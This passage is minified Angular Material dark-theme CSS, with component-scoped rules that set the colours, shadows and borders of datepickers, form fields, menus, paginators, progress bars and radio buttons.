.mat-calendar-body-comparison-bridge-start[_ngcontent-%COMP%]:before{background:linear-gradient(to left,rgba(123,31,162,.2) 50%,rgba(249,171,0,.2) 50%)}.darkMode[_ngcontent-%COMP%]   .mat-datepicker-content.mat-accent[_ngcontent-%COMP%]   .mat-calendar-body-in-range[_ngcontent-%COMP%] > .mat-calendar-body-comparison-identical[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-datepicker-content.mat-accent[_ngcontent-%COMP%]   .mat-calendar-body-in-comparison-range.mat-calendar-body-in-range[_ngcontent-%COMP%]:after{background:#a8dab5}.darkMode[_ngcontent-%COMP%]   .mat-datepicker-content.mat-accent[_ngcontent-%COMP%]   .mat-calendar-body-comparison-identical.mat-calendar-body-selected[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-datepicker-content.mat-accent[_ngcontent-%COMP%]   .mat-calendar-body-in-comparison-range[_ngcontent-%COMP%] > .mat-calendar-body-selected[_ngcontent-%COMP%]{background:#46a35e}.darkMode[_ngcontent-%COMP%]   .mat-datepicker-content.mat-accent[_ngcontent-%COMP%]   .mat-calendar-body-selected[_ngcontent-%COMP%]{background-color:#7b1fa2;color:#fff}.darkMode[_ngcontent-%COMP%]   .mat-datepicker-content.mat-accent[_ngcontent-%COMP%]   .mat-calendar-body-disabled[_ngcontent-%COMP%] > .mat-calendar-body-selected[_ngcontent-%COMP%]{background-color:#7b1fa266}.darkMode[_ngcontent-%COMP%]   .mat-datepicker-content.mat-accent[_ngcontent-%COMP%]   .mat-calendar-body-today.mat-calendar-body-selected[_ngcontent-%COMP%]{box-shadow:inset 0 0 0 1px #fff}.darkMode[_ngcontent-%COMP%]   .mat-datepicker-content.mat-accent[_ngcontent-%COMP%]   .cdk-keyboard-focused[_ngcontent-%COMP%]   .mat-calendar-body-active[_ngcontent-%COMP%] > .mat-calendar-body-cell-content[_ngcontent-%COMP%]:not(.mat-calendar-body-selected):not(.mat-calendar-body-comparison-identical), .darkMode[_ngcontent-%COMP%]   .mat-datepicker-content.mat-accent[_ngcontent-%COMP%]   .cdk-program-focused[_ngcontent-%COMP%]   .mat-calendar-body-active[_ngcontent-%COMP%] > .mat-calendar-body-cell-content[_ngcontent-%COMP%]:not(.mat-calendar-body-selected):not(.mat-calendar-body-comparison-identical){background-color:#7b1fa24d}@media (hover: hover){.darkMode[_ngcontent-%COMP%]   .mat-datepicker-content.mat-accent[_ngcontent-%COMP%]   .mat-calendar-body-cell[_ngcontent-%COMP%]:not(.mat-calendar-body-disabled):hover > .mat-calendar-body-cell-content[_ngcontent-%COMP%]:not(.mat-calendar-body-selected):not(.mat-calendar-body-comparison-identical){background-color:#7b1fa24d}}.darkMode[_ngcontent-%COMP%]   .mat-datepicker-content.mat-warn[_ngcontent-%COMP%]   .mat-calendar-body-in-range[_ngcontent-%COMP%]:before{background:rgba(244,67,54,.2)}.darkMode[_ngcontent-%COMP%]   .mat-datepicker-content.mat-warn[_ngcontent-%COMP%]   .mat-calendar-body-comparison-identical[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-datepicker-content.mat-warn[_ngcontent-%COMP%]   .mat-calendar-body-in-comparison-range[_ngcontent-%COMP%]:before{background:rgba(249,171,0,.2)}.darkMode[_ngcontent-%COMP%]   .mat-datepicker-content.mat-warn[_ngcontent-%COMP%]   .mat-calendar-body-comparison-bridge-start[_ngcontent-%COMP%]:before, .darkMode[_ngcontent-%COMP%]   .mat-datepicker-content.mat-warn[_ngcontent-%COMP%]   [dir=rtl][_ngcontent-%COMP%]   .mat-calendar-body-comparison-bridge-end[_ngcontent-%COMP%]:before{background:linear-gradient(to right,rgba(244,67,54,.2) 50%,rgba(249,171,0,.2) 50%)}.darkMode[_ngcontent-%COMP%]   .mat-datepicker-content.mat-warn[_ngcontent-%COMP%]   .mat-calendar-body-comparison-bridge-end[_ngcontent-%COMP%]:before, .darkMode[_ngcontent-%COMP%]   .mat-datepicker-content.mat-warn[_ngcontent-%COMP%]   [dir=rtl][_ngcontent-%COMP%]   .mat-calendar-body-comparison-bridge-start[_ngcontent-%COMP%]:before{background:linear-gradient(to left,rgba(244,67,54,.2) 50%,rgba(249,171,0,.2) 50%)}.darkMode[_ngcontent-%COMP%]   .mat-datepicker-content.mat-warn[_ngcontent-%COMP%]   .mat-calendar-body-in-range[_ngcontent-%COMP%] > .mat-calendar-body-comparison-identical[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-datepicker-content.mat-warn[_ngcontent-%COMP%]   .mat-calendar-body-in-comparison-range.mat-calendar-body-in-range[_ngcontent-%COMP%]:after{background:#a8dab5}.darkMode[_ngcontent-%COMP%]   .mat-datepicker-content.mat-warn[_ngcontent-%COMP%]   .mat-calendar-body-comparison-identical.mat-calendar-body-selected[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-datepicker-content.mat-warn[_ngcontent-%COMP%]   .mat-calendar-body-in-comparison-range[_ngcontent-%COMP%] > .mat-calendar-body-selected[_ngcontent-%COMP%]{background:#46a35e}.darkMode[_ngcontent-%COMP%]   .mat-datepicker-content.mat-warn[_ngcontent-%COMP%]   .mat-calendar-body-selected[_ngcontent-%COMP%]{background-color:#f44336;color:#fff}.darkMode[_ngcontent-%COMP%]   .mat-datepicker-content.mat-warn[_ngcontent-%COMP%]   .mat-calendar-body-disabled[_ngcontent-%COMP%] > .mat-calendar-body-selected[_ngcontent-%COMP%]{background-color:#f4433666}.darkMode[_ngcontent-%COMP%]   .mat-datepicker-content.mat-warn[_ngcontent-%COMP%]   .mat-calendar-body-today.mat-calendar-body-selected[_ngcontent-%COMP%]{box-shadow:inset 0 0 0 1px #fff}.darkMode[_ngcontent-%COMP%]   .mat-datepicker-content.mat-warn[_ngcontent-%COMP%]   .cdk-keyboard-focused[_ngcontent-%COMP%]   .mat-calendar-body-active[_ngcontent-%COMP%] > .mat-calendar-body-cell-content[_ngcontent-%COMP%]:not(.mat-calendar-body-selected):not(.mat-calendar-body-comparison-identical), .darkMode[_ngcontent-%COMP%]   .mat-datepicker-content.mat-warn[_ngcontent-%COMP%]   .cdk-program-focused[_ngcontent-%COMP%]   .mat-calendar-body-active[_ngcontent-%COMP%] > .mat-calendar-body-cell-content[_ngcontent-%COMP%]:not(.mat-calendar-body-selected):not(.mat-calendar-body-comparison-identical){background-color:#f443364d}@media (hover: hover){.darkMode[_ngcontent-%COMP%]   .mat-datepicker-content.mat-warn[_ngcontent-%COMP%]   .mat-calendar-body-cell[_ngcontent-%COMP%]:not(.mat-calendar-body-disabled):hover > .mat-calendar-body-cell-content[_ngcontent-%COMP%]:not(.mat-calendar-body-selected):not(.mat-calendar-body-comparison-identical){background-color:#f443364d}}.darkMode[_ngcontent-%COMP%]   .mat-datepicker-content-touch[_ngcontent-%COMP%]{box-shadow:0 11px 15px -7px #0003,0 24px 38px 3px #00000024,0 9px 46px 8px #0000001f}.darkMode[_ngcontent-%COMP%]   .mat-datepicker-toggle-active[_ngcontent-%COMP%]{color:#2196f3}.darkMode[_ngcontent-%COMP%]   .mat-datepicker-toggle-active.mat-accent[_ngcontent-%COMP%]{color:#7b1fa2}.darkMode[_ngcontent-%COMP%]   .mat-datepicker-toggle-active.mat-warn[_ngcontent-%COMP%]{color:#f44336}.darkMode[_ngcontent-%COMP%]   .mat-date-range-input-inner[disabled][_ngcontent-%COMP%]{color:#ffffff80}.darkMode[_ngcontent-%COMP%]   .mat-dialog-container[_ngcontent-%COMP%]{box-shadow:0 11px 15px -7px #0003,0 24px 38px 3px #00000024,0 9px 46px 8px #0000001f;background:#424242;color:#fff}.darkMode[_ngcontent-%COMP%]   .mat-divider[_ngcontent-%COMP%]{border-top-color:#ffffff1f}.darkMode[_ngcontent-%COMP%]   .mat-divider-vertical[_ngcontent-%COMP%]{border-right-color:#ffffff1f}.darkMode[_ngcontent-%COMP%]   .mat-expansion-panel[_ngcontent-%COMP%]{background:#424242;color:#fff}.darkMode[_ngcontent-%COMP%]   .mat-expansion-panel[_ngcontent-%COMP%]:not([class*=mat-elevation-z]){box-shadow:0 3px 1px -2px #0003,0 2px 2px #00000024,0 1px 5px #0000001f}.darkMode[_ngcontent-%COMP%]   .mat-action-row[_ngcontent-%COMP%]{border-top-color:#ffffff1f}.darkMode[_ngcontent-%COMP%]   .mat-expansion-panel[_ngcontent-%COMP%]   .mat-expansion-panel-header.cdk-keyboard-focused[_ngcontent-%COMP%]:not([aria-disabled=true]), .darkMode[_ngcontent-%COMP%]   .mat-expansion-panel[_ngcontent-%COMP%]   .mat-expansion-panel-header.cdk-program-focused[_ngcontent-%COMP%]:not([aria-disabled=true]), .darkMode[_ngcontent-%COMP%]   .mat-expansion-panel[_ngcontent-%COMP%]:not(.mat-expanded)   .mat-expansion-panel-header[_ngcontent-%COMP%]:hover:not([aria-disabled=true]){background:rgba(255,255,255,.04)}@media (hover: none){.darkMode[_ngcontent-%COMP%]   .mat-expansion-panel[_ngcontent-%COMP%]:not(.mat-expanded):not([aria-disabled=true])   .mat-expansion-panel-header[_ngcontent-%COMP%]:hover{background:#424242}}.darkMode[_ngcontent-%COMP%]   .mat-expansion-panel-header-title[_ngcontent-%COMP%]{color:#fff}.darkMode[_ngcontent-%COMP%]   .mat-expansion-panel-header-description[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-expansion-indicator[_ngcontent-%COMP%]:after{color:#ffffffb3}.darkMode[_ngcontent-%COMP%]   .mat-expansion-panel-header[aria-disabled=true][_ngcontent-%COMP%]{color:#ffffff4d}.darkMode[_ngcontent-%COMP%]   .mat-expansion-panel-header[aria-disabled=true][_ngcontent-%COMP%]   .mat-expansion-panel-header-title[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-expansion-panel-header[aria-disabled=true][_ngcontent-%COMP%]   .mat-expansion-panel-header-description[_ngcontent-%COMP%]{color:inherit}.darkMode[_ngcontent-%COMP%]   .mat-form-field-label[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-hint[_ngcontent-%COMP%]{color:#ffffffb3}.darkMode[_ngcontent-%COMP%]   .mat-form-field.mat-focused[_ngcontent-%COMP%]   .mat-form-field-label[_ngcontent-%COMP%]{color:#2196f3}.darkMode[_ngcontent-%COMP%]   .mat-form-field.mat-focused[_ngcontent-%COMP%]   .mat-form-field-label.mat-accent[_ngcontent-%COMP%]{color:#7b1fa2}.darkMode[_ngcontent-%COMP%]   .mat-form-field.mat-focused[_ngcontent-%COMP%]   .mat-form-field-label.mat-warn[_ngcontent-%COMP%]{color:#f44336}.darkMode[_ngcontent-%COMP%]   .mat-focused[_ngcontent-%COMP%]   .mat-form-field-required-marker[_ngcontent-%COMP%]{color:#7b1fa2}.darkMode[_ngcontent-%COMP%]   .mat-form-field-ripple[_ngcontent-%COMP%]{background-color:#fff}.darkMode[_ngcontent-%COMP%]   .mat-form-field.mat-focused[_ngcontent-%COMP%]   .mat-form-field-ripple[_ngcontent-%COMP%]{background-color:#2196f3}.darkMode[_ngcontent-%COMP%]   .mat-form-field.mat-focused[_ngcontent-%COMP%]   .mat-form-field-ripple.mat-accent[_ngcontent-%COMP%]{background-color:#7b1fa2}.darkMode[_ngcontent-%COMP%]   .mat-form-field.mat-focused[_ngcontent-%COMP%]   .mat-form-field-ripple.mat-warn[_ngcontent-%COMP%]{background-color:#f44336}.darkMode[_ngcontent-%COMP%]   .mat-form-field-type-mat-native-select.mat-focused[_ngcontent-%COMP%]:not(.mat-form-field-invalid)   .mat-form-field-infix[_ngcontent-%COMP%]:after{color:#2196f3}.darkMode[_ngcontent-%COMP%]   .mat-form-field-type-mat-native-select.mat-focused[_ngcontent-%COMP%]:not(.mat-form-field-invalid).mat-accent   .mat-form-field-infix[_ngcontent-%COMP%]:after{color:#7b1fa2}.darkMode[_ngcontent-%COMP%]   .mat-form-field-type-mat-native-select.mat-focused[_ngcontent-%COMP%]:not(.mat-form-field-invalid).mat-warn   .mat-form-field-infix[_ngcontent-%COMP%]:after{color:#f44336}.darkMode[_ngcontent-%COMP%]   .mat-form-field.mat-form-field-invalid[_ngcontent-%COMP%]   .mat-form-field-label[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-form-field.mat-form-field-invalid[_ngcontent-%COMP%]   .mat-form-field-label.mat-accent[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-form-field.mat-form-field-invalid[_ngcontent-%COMP%]   .mat-form-field-label[_ngcontent-%COMP%]   .mat-form-field-required-marker[_ngcontent-%COMP%]{color:#f44336}.darkMode[_ngcontent-%COMP%]   .mat-form-field.mat-form-field-invalid[_ngcontent-%COMP%]   .mat-form-field-ripple[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-form-field.mat-form-field-invalid[_ngcontent-%COMP%]   .mat-form-field-ripple.mat-accent[_ngcontent-%COMP%]{background-color:#f44336}.darkMode[_ngcontent-%COMP%]   .mat-error[_ngcontent-%COMP%]{color:#f44336}.darkMode[_ngcontent-%COMP%]   .mat-form-field-appearance-legacy[_ngcontent-%COMP%]   .mat-form-field-label[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-form-field-appearance-legacy[_ngcontent-%COMP%]   .mat-hint[_ngcontent-%COMP%]{color:#ffffffb3}.darkMode[_ngcontent-%COMP%]   .mat-form-field-appearance-legacy[_ngcontent-%COMP%]   .mat-form-field-underline[_ngcontent-%COMP%]{background-color:#ffffffb3}.darkMode[_ngcontent-%COMP%]   .mat-form-field-appearance-legacy.mat-form-field-disabled[_ngcontent-%COMP%]   .mat-form-field-underline[_ngcontent-%COMP%]{background-image:linear-gradient(to right,rgba(255,255,255,.7) 0%,rgba(255,255,255,.7) 33%,transparent 0%);background-size:4px 100%;background-repeat:repeat-x}.darkMode[_ngcontent-%COMP%]   .mat-form-field-appearance-standard[_ngcontent-%COMP%]   .mat-form-field-underline[_ngcontent-%COMP%]{background-color:#ffffffb3}.darkMode[_ngcontent-%COMP%]   .mat-form-field-appearance-standard.mat-form-field-disabled[_ngcontent-%COMP%]   .mat-form-field-underline[_ngcontent-%COMP%]{background-image:linear-gradient(to right,rgba(255,255,255,.7) 0%,rgba(255,255,255,.7) 33%,transparent 0%);background-size:4px 100%;background-repeat:repeat-x}.darkMode[_ngcontent-%COMP%]   .mat-form-field-appearance-fill[_ngcontent-%COMP%]   .mat-form-field-flex[_ngcontent-%COMP%]{background-color:#ffffff1a}.darkMode[_ngcontent-%COMP%]   .mat-form-field-appearance-fill.mat-form-field-disabled[_ngcontent-%COMP%]   .mat-form-field-flex[_ngcontent-%COMP%]{background-color:#ffffff0d}.darkMode[_ngcontent-%COMP%]   .mat-form-field-appearance-fill[_ngcontent-%COMP%]   .mat-form-field-underline[_ngcontent-%COMP%]:before{background-color:#ffffff80}.darkMode[_ngcontent-%COMP%]   .mat-form-field-appearance-fill.mat-form-field-disabled[_ngcontent-%COMP%]   .mat-form-field-label[_ngcontent-%COMP%]{color:#ffffff80}.darkMode[_ngcontent-%COMP%]   .mat-form-field-appearance-fill.mat-form-field-disabled[_ngcontent-%COMP%]   .mat-form-field-underline[_ngcontent-%COMP%]:before{background-color:transparent}.darkMode[_ngcontent-%COMP%]   .mat-form-field-appearance-outline[_ngcontent-%COMP%]   .mat-form-field-outline[_ngcontent-%COMP%]{color:#ffffff4d}.darkMode[_ngcontent-%COMP%]   .mat-form-field-appearance-outline[_ngcontent-%COMP%]   .mat-form-field-outline-thick[_ngcontent-%COMP%]{color:#fff}.darkMode[_ngcontent-%COMP%]   .mat-form-field-appearance-outline.mat-focused[_ngcontent-%COMP%]   .mat-form-field-outline-thick[_ngcontent-%COMP%]{color:#2196f3}.darkMode[_ngcontent-%COMP%]   .mat-form-field-appearance-outline.mat-focused.mat-accent[_ngcontent-%COMP%]   .mat-form-field-outline-thick[_ngcontent-%COMP%]{color:#7b1fa2}.darkMode[_ngcontent-%COMP%]   .mat-form-field-appearance-outline.mat-focused.mat-warn[_ngcontent-%COMP%]   .mat-form-field-outline-thick[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-form-field-appearance-outline.mat-form-field-invalid.mat-form-field-invalid[_ngcontent-%COMP%]   .mat-form-field-outline-thick[_ngcontent-%COMP%]{color:#f44336}.darkMode[_ngcontent-%COMP%]   .mat-form-field-appearance-outline.mat-form-field-disabled[_ngcontent-%COMP%]   .mat-form-field-label[_ngcontent-%COMP%]{color:#ffffff80}.darkMode[_ngcontent-%COMP%]   .mat-form-field-appearance-outline.mat-form-field-disabled[_ngcontent-%COMP%]   .mat-form-field-outline[_ngcontent-%COMP%]{color:#ffffff26}.darkMode[_ngcontent-%COMP%]   .mat-icon.mat-primary[_ngcontent-%COMP%]{color:#2196f3}.darkMode[_ngcontent-%COMP%]   .mat-icon.mat-accent[_ngcontent-%COMP%]{color:#7b1fa2}.darkMode[_ngcontent-%COMP%]   .mat-icon.mat-warn[_ngcontent-%COMP%]{color:#f44336}.darkMode[_ngcontent-%COMP%]   .mat-form-field-type-mat-native-select[_ngcontent-%COMP%]   .mat-form-field-infix[_ngcontent-%COMP%]:after{color:#ffffffb3}.darkMode[_ngcontent-%COMP%]   .mat-input-element[_ngcontent-%COMP%]:disabled, .darkMode[_ngcontent-%COMP%]   .mat-form-field-type-mat-native-select.mat-form-field-disabled[_ngcontent-%COMP%]   .mat-form-field-infix[_ngcontent-%COMP%]:after{color:#ffffff80}.darkMode[_ngcontent-%COMP%]   .mat-input-element[_ngcontent-%COMP%]{caret-color:#2196f3}.darkMode[_ngcontent-%COMP%]   .mat-input-element[_ngcontent-%COMP%]::placeholder{color:#ffffff80}.darkMode[_ngcontent-%COMP%]   .mat-input-element[_ngcontent-%COMP%]::-moz-placeholder{color:#ffffff80}.darkMode[_ngcontent-%COMP%]   .mat-input-element[_ngcontent-%COMP%]::-webkit-input-placeholder{color:#ffffff80}.darkMode[_ngcontent-%COMP%]   .mat-input-element[_ngcontent-%COMP%]:-ms-input-placeholder{color:#ffffff80}.darkMode[_ngcontent-%COMP%]   .mat-input-element[_ngcontent-%COMP%]:not(.mat-native-select-inline)   option[_ngcontent-%COMP%]{color:#000000de}.darkMode[_ngcontent-%COMP%]   .mat-input-element[_ngcontent-%COMP%]:not(.mat-native-select-inline)   option[_ngcontent-%COMP%]:disabled{color:#00000061}.darkMode[_ngcontent-%COMP%]   .mat-form-field.mat-accent[_ngcontent-%COMP%]   .mat-input-element[_ngcontent-%COMP%]{caret-color:#7b1fa2}.darkMode[_ngcontent-%COMP%]   .mat-form-field.mat-warn[_ngcontent-%COMP%]   .mat-input-element[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-form-field-invalid[_ngcontent-%COMP%]   .mat-input-element[_ngcontent-%COMP%]{caret-color:#f44336}.darkMode[_ngcontent-%COMP%]   .mat-form-field-type-mat-native-select.mat-form-field-invalid[_ngcontent-%COMP%]   .mat-form-field-infix[_ngcontent-%COMP%]:after{color:#f44336}.darkMode[_ngcontent-%COMP%]   .mat-list-base[_ngcontent-%COMP%]   .mat-list-item[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-list-base[_ngcontent-%COMP%]   .mat-list-option[_ngcontent-%COMP%]{color:#fff}.darkMode[_ngcontent-%COMP%]   .mat-list-base[_ngcontent-%COMP%]   .mat-subheader[_ngcontent-%COMP%]{color:#ffffffb3}.darkMode[_ngcontent-%COMP%]   .mat-list-base[_ngcontent-%COMP%]   .mat-list-item-disabled[_ngcontent-%COMP%]{background-color:#ffffff1f;color:#ffffff80}.darkMode[_ngcontent-%COMP%]   .mat-list-option[_ngcontent-%COMP%]:hover, .darkMode[_ngcontent-%COMP%]   .mat-list-option[_ngcontent-%COMP%]:focus, .darkMode[_ngcontent-%COMP%]   .mat-nav-list[_ngcontent-%COMP%]   .mat-list-item[_ngcontent-%COMP%]:hover, .darkMode[_ngcontent-%COMP%]   .mat-nav-list[_ngcontent-%COMP%]   .mat-list-item[_ngcontent-%COMP%]:focus, .darkMode[_ngcontent-%COMP%]   .mat-action-list[_ngcontent-%COMP%]   .mat-list-item[_ngcontent-%COMP%]:hover, .darkMode[_ngcontent-%COMP%]   .mat-action-list[_ngcontent-%COMP%]   .mat-list-item[_ngcontent-%COMP%]:focus{background:rgba(255,255,255,.04)}.darkMode[_ngcontent-%COMP%]   .mat-list-single-selected-option[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-list-single-selected-option[_ngcontent-%COMP%]:hover, .darkMode[_ngcontent-%COMP%]   .mat-list-single-selected-option[_ngcontent-%COMP%]:focus{background:rgba(255,255,255,.12)}.darkMode[_ngcontent-%COMP%]   .mat-menu-panel[_ngcontent-%COMP%]{background:#424242}.darkMode[_ngcontent-%COMP%]   .mat-menu-panel[_ngcontent-%COMP%]:not([class*=mat-elevation-z]){box-shadow:0 2px 4px -1px #0003,0 4px 5px #00000024,0 1px 10px #0000001f}.darkMode[_ngcontent-%COMP%]   .mat-menu-item[_ngcontent-%COMP%]{background:transparent;color:#fff}.darkMode[_ngcontent-%COMP%]   .mat-menu-item[disabled][_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-menu-item[disabled][_ngcontent-%COMP%]   .mat-menu-submenu-icon[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-menu-item[disabled][_ngcontent-%COMP%]   .mat-icon-no-color[_ngcontent-%COMP%]{color:#ffffff80}.darkMode[_ngcontent-%COMP%]   .mat-menu-item[_ngcontent-%COMP%]   .mat-icon-no-color[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-menu-submenu-icon[_ngcontent-%COMP%]{color:#fff}.darkMode[_ngcontent-%COMP%]   .mat-menu-item[_ngcontent-%COMP%]:hover:not([disabled]), .darkMode[_ngcontent-%COMP%]   .mat-menu-item.cdk-program-focused[_ngcontent-%COMP%]:not([disabled]), .darkMode[_ngcontent-%COMP%]   .mat-menu-item.cdk-keyboard-focused[_ngcontent-%COMP%]:not([disabled]), .darkMode[_ngcontent-%COMP%]   .mat-menu-item-highlighted[_ngcontent-%COMP%]:not([disabled]){background:rgba(255,255,255,.04)}.darkMode[_ngcontent-%COMP%]   .mat-paginator[_ngcontent-%COMP%]{background:#424242}.darkMode[_ngcontent-%COMP%]   .mat-paginator[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-paginator-page-size[_ngcontent-%COMP%]   .mat-select-trigger[_ngcontent-%COMP%]{color:#ffffffb3}.darkMode[_ngcontent-%COMP%]   .mat-paginator-decrement[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-paginator-increment[_ngcontent-%COMP%]{border-top:2px solid white;border-right:2px solid white}.darkMode[_ngcontent-%COMP%]   .mat-paginator-first[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-paginator-last[_ngcontent-%COMP%]{border-top:2px solid white}.darkMode[_ngcontent-%COMP%]   .mat-icon-button[disabled][_ngcontent-%COMP%]   .mat-paginator-decrement[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-icon-button[disabled][_ngcontent-%COMP%]   .mat-paginator-increment[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-icon-button[disabled][_ngcontent-%COMP%]   .mat-paginator-first[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-icon-button[disabled][_ngcontent-%COMP%]   .mat-paginator-last[_ngcontent-%COMP%]{border-color:#ffffff80}.darkMode[_ngcontent-%COMP%]   .mat-progress-bar-background[_ngcontent-%COMP%]{fill:#2c4a61}.darkMode[_ngcontent-%COMP%]   .mat-progress-bar-buffer[_ngcontent-%COMP%]{background-color:#2c4a61}.darkMode[_ngcontent-%COMP%]   .mat-progress-bar-fill[_ngcontent-%COMP%]:after{background-color:#2196f3}.darkMode[_ngcontent-%COMP%]   .mat-progress-bar.mat-accent[_ngcontent-%COMP%]   .mat-progress-bar-background[_ngcontent-%COMP%]{fill:#432c4d}.darkMode[_ngcontent-%COMP%]   .mat-progress-bar.mat-accent[_ngcontent-%COMP%]   .mat-progress-bar-buffer[_ngcontent-%COMP%]{background-color:#432c4d}.darkMode[_ngcontent-%COMP%]   .mat-progress-bar.mat-accent[_ngcontent-%COMP%]   .mat-progress-bar-fill[_ngcontent-%COMP%]:after{background-color:#7b1fa2}.darkMode[_ngcontent-%COMP%]   .mat-progress-bar.mat-warn[_ngcontent-%COMP%]   .mat-progress-bar-background[_ngcontent-%COMP%]{fill:#613532}.darkMode[_ngcontent-%COMP%]   .mat-progress-bar.mat-warn[_ngcontent-%COMP%]   .mat-progress-bar-buffer[_ngcontent-%COMP%]{background-color:#613532}.darkMode[_ngcontent-%COMP%]   .mat-progress-bar.mat-warn[_ngcontent-%COMP%]   .mat-progress-bar-fill[_ngcontent-%COMP%]:after{background-color:#f44336}.darkMode[_ngcontent-%COMP%]   .mat-progress-spinner[_ngcontent-%COMP%]   circle[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-spinner[_ngcontent-%COMP%]   circle[_ngcontent-%COMP%]{stroke:#2196f3}.darkMode[_ngcontent-%COMP%]   .mat-progress-spinner.mat-accent[_ngcontent-%COMP%]   circle[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-spinner.mat-accent[_ngcontent-%COMP%]   circle[_ngcontent-%COMP%]{stroke:#7b1fa2}.darkMode[_ngcontent-%COMP%]   .mat-progress-spinner.mat-warn[_ngcontent-%COMP%]   circle[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-spinner.mat-warn[_ngcontent-%COMP%]   circle[_ngcontent-%COMP%]{stroke:#f44336}.darkMode[_ngcontent-%COMP%]   .mat-radio-outer-circle[_ngcontent-%COMP%]{border-color:#ffffffb3}.darkMode[_ngcontent-%COMP%]   .mat-radio-button.mat-primary.mat-radio-checked[_ngcontent-%COMP%]   .mat-radio-outer-circle[_ngcontent-%COMP%]{border-color:#2196f3}.darkMode[_ngcontent-%COMP%]   .mat-radio-button.mat-primary[_ngcontent-%COMP%]   .mat-radio-inner-circle[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-radio-button.mat-primary[_ngcontent-%COMP%]   .mat-radio-ripple[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%]:not(.mat-radio-persistent-ripple), .darkMode[_ngcontent-%COMP%]   .mat-radio-button.mat-primary.mat-radio-checked[_ngcontent-%COMP%]   .mat-radio-persistent-ripple[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-radio-button.mat-primary[_ngcontent-%COMP%]:active   .mat-radio-persistent-ripple[_ngcontent-%COMP%]{background-color:#2196f3}.darkMode[_ngcontent-%COMP%]   .mat-radio-button.mat-accent.mat-radio-checked[_ngcontent-%COMP%]   .mat-radio-outer-circle[_ngcontent-%COMP%]{border-color:#7b1fa2}.darkMode[_ngcontent-%COMP%]   .mat-radio-button.mat-accent[_ngcontent-%COMP%]   .mat-radio-inner-circle[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-radio-button.mat-accent[_ngcontent-%COMP%]   .mat-radio-ripple[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%]:not(.mat-radio-persistent-ripple), .darkMode[_ngcontent-%COMP%]   .mat-radio-button.mat-accent.mat-radio-checked[_ngcontent-%COMP%]   .mat-radio-persistent-ripple[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-radio-button.mat-accent[_ngcontent-%COMP%]:active   .mat-radio-persistent-ripple[_ngcontent-%COMP%]{background-color:#7b1fa2}.darkMode[_ngcontent-%COMP%]   .mat-radio-button.mat-warn.mat-radio-checked[_ngcontent-%COMP%]   .mat-radio-outer-circle[_ngcontent-%COMP%]{border-color:#f44336}.darkMode[_ngcontent-%COMP%]   .mat-radio-button.mat-warn[_ngcontent-%COMP%]   .mat-radio-inner-circle[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-radio-button.mat-warn[_ngcontent-%COMP%]   .mat-radio-ripple[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%]:not(.mat-radio-persistent-ripple), .darkMode[_ngcontent-%COMP%]   .mat-radio-button.mat-warn.mat-radio-checked[_ngcontent-%COMP%]   .mat-radio-persistent-ripple[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-radio-button.mat-warn[_ngcontent-%COMP%]:active   .mat-radio-persistent-ripple[_ngcontent-%COMP%]{background-color:#f44336}.darkMode[_ngcontent-%COMP%]   .mat-radio-button.mat-radio-disabled.mat-radio-checked[_ngcontent-%COMP%]   .mat-radio-outer-circle[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-radio-button.mat-radio-disabled[_ngcontent-%COMP%]   .mat-radio-outer-circle[_ngcontent-%COMP%]{border-color:#ffffff80}.darkMode[_ngcontent-%COMP%]   .mat-radio-button.mat-radio-disabled[_ngcontent-%COMP%]   .mat-radio-ripple[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-radio-button.mat-radio-disabled[_ngcontent-%COMP%]   .mat-radio-inner-circle[_ngcontent-%COMP%]{background-color:#ffffff80}.darkMode[_ngcontent-%COMP%]   .mat-radio-button.mat-radio-disabled[_ngcontent-%COMP%]   .mat-radio-label-content[_ngcontent-%COMP%]{color:#ffffff80}.darkMode[_ngcontent-%COMP%]   .mat-radio-button[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%]{background-color:#fff}.darkMode[_ngcontent-%COMP%]   